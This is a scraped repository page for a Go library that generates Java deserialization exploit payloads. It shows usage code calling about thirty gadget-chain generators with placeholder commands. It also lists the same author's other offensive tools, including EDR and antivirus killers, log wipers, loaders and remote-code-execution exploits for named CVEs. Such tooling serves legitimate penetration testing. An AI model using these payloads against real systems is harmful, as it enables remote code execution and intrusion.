qi4L/GlangYsoserial qi4L/GlangYsoserial

  • Stars
    star
    141
  • Rank 259,971 (Top 6 %)
  • Language
    Go
  • Created over 1 year ago
  • Updated 8 months ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
qi4L/GlangYsoserial
github

qi4L

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

A Go library for generating Java deserialization payloads.

当用GO写JAVA反序列化EXP的时候, 每次都要重写生成,调用不方便时, 可以使用本库

使用方法示例

package main

import (
	"encoding/hex"
	"fmt"
        "github.com/nu1r/GlangYsoserial"
)

func main() {
    // 如果你需要使用使用 TemplatesImpl 类实现的Gadget, 但是又懒得去JAVA实现后输出,可以调用 TemplatesImpl 函数的返回值作为参数
	fmt.Println(hex.Dump(ysoserial.TemplatesImpl("example command")))

	fmt.Println(hex.Dump(ysoserial.URLDNS("example domain")))
	fmt.Println(hex.Dump(ysoserial.Click1([]byte("example bytes"))))
	fmt.Println(hex.Dump(ysoserial.Clojure("example command")))
	fmt.Println(hex.Dump(ysoserial.CommonsBeanutils1([]byte("example bytes"))))
	fmt.Println(hex.Dump(ysoserial.CommonsBeanutils2([]byte("example bytes"))))
	fmt.Println(hex.Dump(ysoserial.CommonsCollections1("example command")))
	fmt.Println(hex.Dump(ysoserial.CommonsCollections2([]byte("example bytes"))))
	fmt.Println(hex.Dump(ysoserial.CommonsCollections3([]byte("example bytes"))))
	fmt.Println(hex.Dump(ysoserial.CommonsCollections4([]byte("example bytes"))))
	fmt.Println(hex.Dump(ysoserial.CommonsCollections5("example command")))
	fmt.Println(hex.Dump(ysoserial.CommonsCollections6("example command")))
	fmt.Println(hex.Dump(ysoserial.CommonsCollections7("example command")))
	fmt.Println(hex.Dump(ysoserial.CommonsCollections8([]byte("example bytes"))))
	fmt.Println(hex.Dump(ysoserial.CommonsCollections9("example command")))
	fmt.Println(hex.Dump(ysoserial.CommonsCollections10([]byte("example bytes"))))
	fmt.Println(hex.Dump(ysoserial.CommonsCollections11("example command")))
	fmt.Println(hex.Dump(ysoserial.CommonsCollections12("example command")))
	fmt.Println(hex.Dump(ysoserial.CommonsCollectionsK1([]byte("example bytes"))))
	fmt.Println(hex.Dump(ysoserial.CommonsCollectionsK2([]byte("example bytes"))))
	fmt.Println(hex.Dump(ysoserial.Fastjson1([]byte("example bytes"))))
	fmt.Println(hex.Dump(ysoserial.Fastjson2([]byte("example bytes"))))
	fmt.Println(hex.Dump(ysoserial.Groovy1("example command")))
	fmt.Println(hex.Dump(ysoserial.Jdk7u21([]byte("example bytes"))))
	fmt.Println(hex.Dump(ysoserial.Jdk8u20([]byte("example bytes"))))
	fmt.Println(hex.Dump(ysoserial.JSON1([]byte("example bytes"))))
	fmt.Println(hex.Dump(ysoserial.ROME([]byte("example bytes"))))
	fmt.Println(hex.Dump(ysoserial.ROME2([]byte("example bytes"))))
	fmt.Println(hex.Dump(ysoserial.ROME3([]byte("example bytes"))))
	fmt.Println(hex.Dump(ysoserial.Spring1([]byte("example bytes"))))
	fmt.Println(hex.Dump(ysoserial.Spring2([]byte("example bytes"))))
}

More Repositories

1

JYso

It can be either a JNDIExploit or a ysoserial.
Java
1,393
star
2

Unhooker

EDR绕过demo
Go
277
star
3

CVE-2024-38077

RDL的堆溢出导致的RCE
Python
157
star
4

CallbackLoader

Callback Function Loader Implemented in Go
Go
135
star
5

WeblogicScan.go

WeblogicScan一键检测
Go
122
star
6

KscanPro

轻量化全方位扫描器
Go
122
star
7

yongyouScan.go

用友漏洞批量检测
Go
95
star
8

Struts2Scan.go

用golang实现的Struts2扫描工具
Go
71
star
9

QVD-2023-13065

Nacos JRaft Hessian 反序列化 RCE EXP
Java
64
star
10

GoPhant0m

kill windows log
Go
41
star
11

monitor-Go

AWD 文件监控
Go
25
star
12

seeyonerExp

致远OA利用工具
Go
25
star
13

CVE-2023-25610

FortiOS 管理界面中的堆内存下溢导致远程代码执行
Python
21
star
14

Blackout.go

kill AV/EDR
Go
19
star
15

eBPFShell

Kernel shell
C
9
star
16

rust_gabh

由 rust 重构的各类Gate技术
Rust
6
star
17

VEHPageHook

loader
Rust
2
star
18

SQL_injection_Bool

Python
2
star
19

qi4l.github.io

HTML
1
star
20

Fscan-AL

Fscan Adaptive Learning Edition
Go
1
star